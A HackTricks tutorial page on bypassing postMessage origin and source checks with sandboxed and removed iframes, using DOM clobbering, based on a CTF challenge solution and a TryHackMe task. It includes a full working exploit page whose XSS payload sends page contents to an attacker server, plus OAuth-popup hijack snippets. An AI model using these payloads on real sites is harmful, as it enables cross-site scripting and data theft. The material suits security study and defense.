Bypassing SOP with Iframes - 2
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
Iframes in SOP-2
In the solution for this challenge, @Strellic_ proposes a similar method to the previous section. Let’s check it.
In this challenge the attacker needs to bypass this:
if (e.source == window.calc.contentWindow && e.data.token == window.token) {
If he does, he can send a postmessage with HTML content that is going to be written in the page with innerHTML without sanitation (XSS).
The way to bypass the first check is by making window.calc.contentWindow to undefined and e.source to null:
window.calc.contentWindowis actuallydocument.getElementById("calc"). You can clobberdocument.getElementByIdwith<img name=getElementById />(note that Sanitizer API -here- is not configured to protect against DOM clobbering attacks in its default state).- Therefore, you can clobber
document.getElementById("calc")with<img name=getElementById /><div id=calc></div>. Then,window.calcwill beundefined. - Now, we need
e.sourceto beundefinedornull(because==is used instead of===,null == undefinedisTrue). Getting this is “easy”. If you create an iframe and send a postMessage from it and immediately remove the iframe,e.originis going to benull. Check the following code
- Therefore, you can clobber
let iframe = document.createElement("iframe")
document.body.appendChild(iframe)
window.target = window.open("http://localhost:8080/")
await new Promise((r) => setTimeout(r, 2000)) // wait for page to load
iframe.contentWindow.eval(`window.parent.target.postMessage("A", "*")`)
document.body.removeChild(iframe) //e.origin === null
In order to bypass the second check about token is by sending token with value null and making window.token value undefined:
- Sending
tokenin the postMessage with valuenullis trivial. window.tokenin calling the functiongetCookiewhich usesdocument.cookie. Note that any access todocument.cookieinnullorigin pages tigger an error. This will makewindow.tokenhaveundefinedvalue.
The final solution by @terjanq is the following:
<html>
<body>
<script>
// Abuse "expr" param to cause a HTML injection and
// clobber document.getElementById and make window.calc.contentWindow undefined
open(
'https://obligatory-calc.ctf.sekai.team/?expr="<form name=getElementById id=calc>"'
)
function start() {
var ifr = document.createElement("iframe")
// Create a sandboxed iframe, as sandboxed iframes will have origin null
// this null origin will document.cookie trigger an error and window.token will be undefined
ifr.sandbox = "allow-scripts allow-popups"
ifr.srcdoc = `<script>(${hack})()<\/script>`
document.body.appendChild(ifr)
function hack() {
var win = open("https://obligatory-calc.ctf.sekai.team")
setTimeout(() => {
parent.postMessage("remove", "*")
// this bypasses the check if (e.source == window.calc.contentWindow && e.data.token == window.token), because
// token=null equals to undefined and e.source will be null so null == undefined
win.postMessage(
{
token: null,
result:
"<img src onerror='location=`https://myserver/?t=${escape(window.results.innerHTML)}`'>",
},
"*"
)
}, 1000)
}
// this removes the iframe so e.source becomes null in postMessage event.
onmessage = (e) => {
if (e.data == "remove") document.body.innerHTML = ""
}
}
setTimeout(start, 1000)
</script>
</body>
</html>
2025 Null-Origin Popups (TryHackMe - Vulnerable Codes)
A recent TryHackMe task (“Vulnerable Codes”) demonstrates how OAuth popups can be hijacked when the opener lives inside a sandboxed iframe that only allows scripts and popups. The iframe forces both itself and the popup into a "null" origin, so handlers checking if (origin !== window.origin) return silently fail because window.origin inside the popup is also "null". Even though the browser still exposes the real location.origin, the victim never inspects it, so attacker-controlled messages glide through.
const frame = document.createElement('iframe');
frame.sandbox = 'allow-scripts allow-popups';
frame.srcdoc = `
<script>
const pop = open('https://oauth.example/callback');
pop.postMessage({ cmd: 'getLoginCode' }, '*');
<\/script>`;
document.body.appendChild(frame);
Takeaways for abusing that setup:
- Handlers that compare
originwithwindow.origininside the popup can be bypassed because both evaluate to"null", so forged messages look legitimate. - Sandboxed iframes that grant
allow-popupsbut omitallow-same-originstill spawn popups locked to the attacker-controlled null origin, giving you a stable enclave even in 2025 Chromium builds.
Source-nullification & frame-restriction bypasses
Industry writeups around CVE-2024-49038 highlight two reusable primitives for this page: (1) you can still interact with pages that set X-Frame-Options: DENY by launching them via window.open and posting messages once the navigation settles, and (2) you can brute-force event.source == victimFrame checks by removing the iframe immediately after sending a message so that the receiver only sees null in the handler.
const probe = document.createElement('iframe');
probe.sandbox = 'allow-scripts';
probe.onload = () => {
const victim = open('https://target-app/');
setTimeout(() => {
probe.contentWindow.postMessage(payload, '*');
probe.remove();
}, 500);
};
document.body.appendChild(probe);
Combine this with the DOM-clobbering trick above: once the receiver only sees event.source === null, any comparison against window.calc.contentWindow or similar collapses, letting you ship malicious HTML sinks through innerHTML again.
References
- PostMessage Vulnerabilities: When Cross-Window Communication Goes Wrong
- THM Write-up: Vulnerable Codes
Tip
Learn & practice AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking:HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
HackTricks

